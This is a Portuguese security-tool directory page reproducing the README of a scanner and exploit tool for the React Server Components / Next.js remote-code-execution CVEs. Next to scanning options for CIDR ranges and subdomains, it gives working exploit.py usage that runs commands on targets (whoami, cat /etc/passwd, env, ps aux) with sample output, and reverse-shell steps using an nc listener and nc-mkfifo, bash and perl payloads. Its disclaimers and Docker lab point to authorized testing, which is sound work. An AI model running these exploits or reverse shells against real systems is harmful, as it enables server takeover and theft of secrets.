Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
react2shell-scanner-CVE-2025-55182 — React2shell-web-scanner | Kitploit
Ferramentas/GitHubGitHub/security-phoenix-demo/react2shell-scanner-cve-2025-55182
Gerenciamento de Indicadores de Comprometimento (IOC)Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebInteligência de AmeaçasEnumeração de SubdomíniosAprendizado e EducaçãoDesenvolvimento de Payloads

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Labs e Prática
GitHubsecurity-phoenix-demo/react2shell-scanner-cve-2025-55182

react2shell-scanner-CVE-2025-55182

React2shell-web-scanner

Ver Repositório
212há 9 mesesAinda não revisado
Compartilhar

Scanner Empresarial React2Shell

Scanner de vulnerabilidades de alta fidelidade para CVE-2025-55182 e CVE-2025-66478 - Vulnerabilidades de Execução Remota de Código em React Server Components / Next.js.

📖 Para análise técnica detalhada, mecânica de exploração e dados IOC, consulte SECURITY-RESEARCH.md


⚠️ AVISO

Esta ferramenta é fornecida APENAS para FINS EDUCACIONAIS E DE TESTES DE SEGURANÇA AUTORIZADOS. O acesso não autorizado a sistemas de computador é ilegal. Use estas ferramentas apenas em sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar. Os autores não assumem qualquer responsabilidade pelo uso indevido.


🚨 Visão Geral da Vulnerabilidade

CVEDescriçãoCVSS
CVE-2025-55182RCE por Desserialização Insegura em React Server Components9.8 Crítico
CVE-2025-66478RCE em Server Actions do Next.js9.8 Crítico

Pacotes Afetados:

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.1.0, 19.1.1, 19.2.0

Versões Corrigidas:

  • 19.0.1, 19.1.2, 19.2.1 (para todos os pacotes)

✨ Funcionalidades

  • Entrada multi-alvo: URL única, arquivos de hosts, intervalos CIDR, intervalos de IP
  • Enumeração de subdomínios: Descoberta automática de subdomínios
  • Fingerprinting de tecnologia: Detecta Next.js antes do teste
  • Modo de detecção segura: Detecção de canal lateral sem execução de código
  • Verificação de RCE: Prova de conceito baseada em aritmética
  • Correlação de IOC: Verificação contra infraestrutura maliciosa conhecida
  • Integração com Phoenix Security: Envio de descobertas para a plataforma Phoenix
  • Varredura concorrente: Multithread para escala

📦 Instalação

Usando uv (recomendado)

# Nenhuma instalação necessária - uv gerencia as dependências
uv run react2shell-scanner -u https://example.com

Usando pip

pip install requests tqdm dnspython
python3 react2shell-scanner -u https://example.com

🚀 Uso

Varredura Básica

# URL única
python3 react2shell-scanner -u https://example.com

# Modo seguro (sem execução de RCE)
python3 react2shell-scanner -u https://example.com --safe-check

# A partir de arquivo de hosts
python3 react2shell-scanner -l targets.txt -t 50 -o results.json

# Intervalo CIDR
python3 react2shell-scanner --cidr 192.168.1.0/24 --ports 80,443,3000

# Múltiplos intervalos CIDR
python3 react2shell-scanner --cidr 10.0.0.0/24 --cidr 172.16.0.0/24

Varredura Avançada

# Enumeração de subdomínios
python3 react2shell-scanner -u example.com --enumerate-subdomains

# Wordlist personalizada de subdomínios
python3 react2shell-scanner -u example.com --enumerate-subdomains \
    --subdomain-wordlist "app,api,admin,portal,staging"

# Caminhos personalizados
python3 react2shell-scanner -u https://example.com \
    --path / --path /_next --path /api

# Ignorar fingerprinting (varrer tudo)
python3 react2shell-scanner -l targets.txt --skip-fingerprint --force-scan

# Verboso com SSL desativado
python3 react2shell-scanner -u https://example.com -k -v

Integração com Phoenix Security

# Envio de descobertas para a Phoenix
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --phoenix-config .phoenix.config

# Modo de depuração (salvar payloads)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --debug

# Enviar todos os resultados (não apenas vulnerabilidades)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --all-results

🔧 Configuração

Configuração do Phoenix Security

Crie .phoenix.config:

[phoenix]
client_id = your_client_id_here
client_secret = your_client_secret_here
api_base_url = https://api.demo.appsecphx.io
assessment_name = React2Shell Scanner - Web Vulnerabilities
import_type = new

Ou use variáveis de ambiente:

export PHOENIX_CLIENT_ID=your_client_id
export PHOENIX_CLIENT_SECRET=your_client_secret
export PHOENIX_API_URL=https://api.demo.appsecphx.io
export PHOENIX_ASSESSMENT_NAME="React2Shell Scanner"

🧪 Laboratório de Teste

Um ambiente de teste baseado em Docker está incluído. Consulte Lab-instructions-sample.md para referência rápida.

# Iniciar laboratório
cd test-lab/lab
docker-compose up -d

# Serviços:
# - Vulnerável: http://localhost:3011
# - Corrigido:   http://localhost:3012

# Testar instância vulnerável (coleta segura de evidências)
python3 react2shell-scanner -u http://localhost:3011 -o evidence.json -e

# Testar instância corrigida
python3 react2shell-scanner -u http://localhost:3012 -o evidence.json -e

# Executar demonstração completa
./test-and-demo.sh --full-demo

⚠️ Nota: Comandos de exploração (ex.: exploit.py -c "whoami") acionam RCE REAL. Use apenas em contêineres Docker locais para fins de pesquisa.

💻 Ferramenta de Exploração (exploit.py)

Execute comandos em alvos vulneráveis. Requer Python 3.11+

Instalação

cd test-lab
pip3.11 install -r requirements.txt
# Ou: pip3.11 install rich-click fake-useragent rich requests

Exemplos de Execução de Comando

# Execução básica de comando
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# Saída: nextjs

python3.11 exploit.py -u http://localhost:3011 -c "id"
# Saída: uid=1001(nextjs) gid=65533(nogroup) groups=65533(nogroup)

python3.11 exploit.py -u http://localhost:3011 -c "hostname"
# Saída: 99e28775bf80 (ID do contêiner)

# Enumeração do sistema
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env | head -20"

# Reconhecimento da aplicação
python3.11 exploit.py -u http://localhost:3011 -c "pwd"
# Saída: /app

python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"

# Informações de rede
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/hosts"
python3.11 exploit.py -u http://localhost:3011 -c "netstat -an | head -20"

# Enumeração de processos
python3.11 exploit.py -u http://localhost:3011 -c "ps aux"

Shell Reverso (Avançado)

# Obter gateway da rede Docker
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')

# Iniciar ouvinte (em outro terminal)
nc -lvnp 4444

# Lançar shell reverso
python3.11 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo

# Tipos de payload disponíveis: nc, nc-mkfifo, sh, bash, perl

Opções do Exploit

OpçãoDescrição
-u, --urlURL do alvo (obrigatório)
-c, --cmdComando a executar
-r, --reverseAtivar modo shell reverso
-l, --lhostHost do ouvinte para shell reverso
-p, --lportPorta do ouvinte para shell reverso
-P, --payloadTipo de payload: nc, nc-mkfifo, sh, bash, perl
--timeoutTempo limite da requisição (padrão: 10s)

📊 Formatos de Saída

Saída no Console

[VULNERABLE] https://vulnerable.example.com
    Status: 307
    Detection: rce_arithmetic_check
    
[IOC MATCH] 93.123.109.247
    IP 93.123.109.247 matches known malicious infrastructure
    
[NEXTJS] https://safe.example.com v15.0.0

[NOT VULN] https://other.example.com
Baixar ferramenta